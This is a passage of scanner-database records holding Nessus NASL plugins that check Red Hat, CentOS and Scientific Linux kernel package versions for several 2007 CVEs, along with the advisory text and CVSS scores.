reference:\"kernel-smp-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-smp-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-smp-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-xenU-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-xenU-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:07:59", "bulletinFamily": "scanner", "description": "Updated kernel packages that fix various security issues and several\nbugs in the Red Hat Enterprise Linux 4 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\nA flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n* when running the 'ls -la' command on an NFSv4 mount point, incorrect\nfile attributes, and outdated file size and timestamp information were\nreturned. As well, symbolic links may have been displayed as actual\nfiles.\n\n* a bug which caused the cmirror write path to appear deadlocked after\na successful recovery, which may have caused syncing to hang, has been\nresolved.\n\n* a kernel panic which occurred when manually configuring LCS\ninterfaces on the IBM S/390 has been resolved.\n\n* when running a 32-bit binary on a 64-bit system, it was possible to\nmmap page at address 0 without flag MAP_FIXED set. This has been\nresolved in these updated packages.\n\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\ninterrupt counter in '/proc/interrupts' on systems running an AMD\nOpteron CPU. This caused systems running NMI Watchdog to restart at\nregular intervals.\n\n* a bug which caused the diskdump utility to run very slowly on\ndevices using Fusion MPT has been resolved.\n\nAll users are advised to upgrade to these updated packages, which\nresolve these issues.", "modified": "2018-11-16T00:00:00", "published": "2007-12-24T00:00:00", "id": "REDHAT-RHSA-2007-1104.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29774", "title": "RHEL 4 : kernel (RHSA-2007:1104)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:1104. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29774);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_bugtraq_id(26337);\n script_xref(name:\"RHSA\", value:\"2007:1104\");\n\n script_name(english:\"RHEL 4 : kernel (RHSA-2007:1104)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix various security issues and several\nbugs in the Red Hat Enterprise Linux 4 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\nA flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n* when running the 'ls -la' command on an NFSv4 mount point, incorrect\nfile attributes, and outdated file size and timestamp information were\nreturned. As well, symbolic links may have been displayed as actual\nfiles.\n\n* a bug which caused the cmirror write path to appear deadlocked after\na successful recovery, which may have caused syncing to hang, has been\nresolved.\n\n* a kernel panic which occurred when manually configuring LCS\ninterfaces on the IBM S/390 has been resolved.\n\n* when running a 32-bit binary on a 64-bit system, it was possible to\nmmap page at address 0 without flag MAP_FIXED set. This has been\nresolved in these updated packages.\n\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\ninterrupt counter in '/proc/interrupts' on systems running an AMD\nOpteron CPU. This caused systems running NMI Watchdog to restart at\nregular intervals.\n\n* a bug which caused the diskdump utility to run very slowly on\ndevices using Fusion MPT has been resolved.\n\nAll users are advised to upgrade to these updated packages, which\nresolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4997\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-5494\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:1104\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-largesmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-largesmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xenU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xenU-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:1104\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"kernel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"kernel-devel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"kernel-doc-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-hugemem-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-hugemem-devel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-smp-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-smp-devel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-smp-devel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-xenU-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-xenU-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.EL\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-devel / kernel-doc / kernel-hugemem / etc\");\n }\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:07:58", "bulletinFamily": "scanner", "description": "Updated kernel packages that fix various security issues and several\nbugs in the Red Hat Enterprise Linux 4 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\nA flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n* when running the 'ls -la' command on an NFSv4 mount point, incorrect\nfile attributes, and outdated file size and timestamp information were\nreturned. As well, symbolic links may have been displayed as actual\nfiles.\n\n* a bug which caused the cmirror write path to appear deadlocked after\na successful recovery, which may have caused syncing to hang, has been\nresolved.\n\n* a kernel panic which occurred when manually configuring LCS\ninterfaces on the IBM S/390 has been resolved.\n\n* when running a 32-bit binary on a 64-bit system, it was possible to\nmmap page at address 0 without flag MAP_FIXED set. This has been\nresolved in these updated packages.\n\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\ninterrupt counter in '/proc/interrupts' on systems running an AMD\nOpteron CPU. This caused systems running NMI Watchdog to restart at\nregular intervals.\n\n* a bug which caused the diskdump utility to run very slowly on\ndevices using Fusion MPT has been resolved.\n\nAll users are advised to upgrade to these updated packages, which\nresolve these issues.", "modified": "2018-11-10T00:00:00", "published": "2007-12-24T00:00:00", "id": "CENTOS_RHSA-2007-1104.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29751", "title": "CentOS 4 : kernel (CESA-2007:1104)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:1104 and \n# CentOS Errata and Security Advisory 2007:1104 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29751);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/10 11:49:28\");\n\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_bugtraq_id(26337);\n script_xref(name:\"RHSA\", value:\"2007:1104\");\n\n script_name(english:\"CentOS 4 : kernel (CESA-2007:1104)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix various security issues and several\nbugs in the Red Hat Enterprise Linux 4 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\nA flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n* when running the 'ls -la' command on an NFSv4 mount point, incorrect\nfile attributes, and outdated file size and timestamp information were\nreturned. As well, symbolic links may have been displayed as actual\nfiles.\n\n* a bug which caused the cmirror write path to appear deadlocked after\na successful recovery, which may have caused syncing to hang, has been\nresolved.\n\n* a kernel panic which occurred when manually configuring LCS\ninterfaces on the IBM S/390 has been resolved.\n\n* when running a 32-bit binary on a 64-bit system, it was possible to\nmmap page at address 0 without flag MAP_FIXED set. This has been\nresolved in these updated packages.\n\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\ninterrupt counter in '/proc/interrupts' on systems running an AMD\nOpteron CPU. This caused systems running NMI Watchdog to restart at\nregular intervals.\n\n* a bug which caused the diskdump utility to run very slowly on\ndevices using Fusion MPT has been resolved.\n\nAll users are advised to upgrade to these updated packages, which\nresolve these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-December/014549.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a3ea55ac\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-December/014550.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cbae523f\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-December/014551.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e0eecf7d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-hugemem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-largesmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-largesmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xenU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xenU-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", reference:\"kernel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"kernel-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"kernel-doc-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-hugemem-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-hugemem-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"kernel-largesmp-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-smp-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-smp-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-smp-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-xenU-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-xenU-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.EL\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:14:10", "bulletinFamily": "scanner", "description": "These new kernel packages contain fixes for the following security\nissues :\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nA flaw was found in the handling of IEEE 802.11 frames affecting\nseveral wireless LAN modules. In certain circumstances, a remote\nattacker could trigger this flaw by sending a malicious packet over a\nwireless network and cause a denial of service (kernel crash).\n(CVE-2007-4997, Important).\n\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A\nlocal user who had the ability to read the /proc/driver/snd-page-alloc\nfile could see portions of kernel memory. (CVE-2007-4571, Moderate).\n\nIn addition to the security issues described above, several bug fixes\npreventing possible memory corruption, system crashes, SCSI I/O fails,\nnetworking drivers performance regression and journaling block device\nlayer issue were also included.", "modified": "2019-01-07T00:00:00", "published": "2012-08-01T00:00:00", "id": "SL_20071129_KERNEL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60318", "title": "Scientific Linux Security Update : kernel on SL5.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60318);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/01/07 9:52:18\");\n\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4997\", \"CVE-2007-5494\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"These new kernel packages contain fixes for the following security\nissues :\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nA flaw was found in the handling of IEEE 802.11 frames affecting\nseveral wireless LAN modules. In certain circumstances, a remote\nattacker could trigger this flaw by sending a malicious packet over a\nwireless network and cause a denial of service (kernel crash).\n(CVE-2007-4997, Important).\n\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A\nlocal user who had the ability to read the /proc/driver/snd-page-alloc\nfile could see portions of kernel memory. (CVE-2007-4571, Moderate).\n\nIn addition to the security issues described above, several bug fixes\npreventing possible memory corruption, system crashes, SCSI I/O fails,\nnetworking drivers performance regression and journaling block device\nlayer issue were also included.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0712&L=scientific-linux-errata&T=0&P=197\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f76d5a8f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"kernel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-devel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-devel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-doc-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-headers-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-devel-2.6.18-53.1.4.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": 